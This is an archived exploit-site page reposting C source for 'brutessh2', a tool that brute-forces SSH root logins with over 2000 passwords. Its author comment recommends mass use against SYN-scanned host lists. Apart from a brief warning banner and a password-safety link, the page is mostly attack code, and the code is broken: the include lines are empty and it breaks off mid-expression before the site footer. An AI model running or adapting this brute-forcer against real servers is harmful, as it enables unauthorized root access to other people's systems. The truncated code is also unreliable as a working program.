SSH Remote Root password Brute Force Cracker Utility


                        
 
This exploit is known to be circulating in the wild. Protect yourself and you passwords !
Read : "Choosing and Protecting your Passwords" -> http://www.us-cert.gov/cas/tips/ST04-002.html


/* 
*the first brutessh was only for users guest & test 
*brutessh2 is a brute for sshd port wich atempts to login as root trying more than 2000 passwords for it.
*users guest , test , nobody and admin with no passwords are included.
*feel free to add more passwords and more users:=)
*by Zorg of #texter 
*www.wget.home.ro
*
*For mass use a synscan :
*Eg: ./biggssh sship.txt
* Ok.Try This : Hostname root:12345
*/ 


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int flag;
int where;
int shell(SSH_SESSION *session){
struct timeval tv;
int err;
char cmd[]="uname -r -s\n";
char rd[2048];
BUFFER *readbuf=buffer_new();
time_t start,acum;


CHANNEL *channel;
channel = open_session_channel(session,1000,1000);
if(isatty(0))
err=channel_request_pty(channel);
// printf("channel request pty > %d\n",err);
err= channel_request_shell(channel);
// printf("channel request shell > %d\n",err);
start=time(0);
while (channel->open!=0)
{
usleep(500000);
err=channel_poll(channel,0);
if(err>0)
{
err=channel_read(channel,readbuf,0,0);
}
else
{
if(start+5

 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits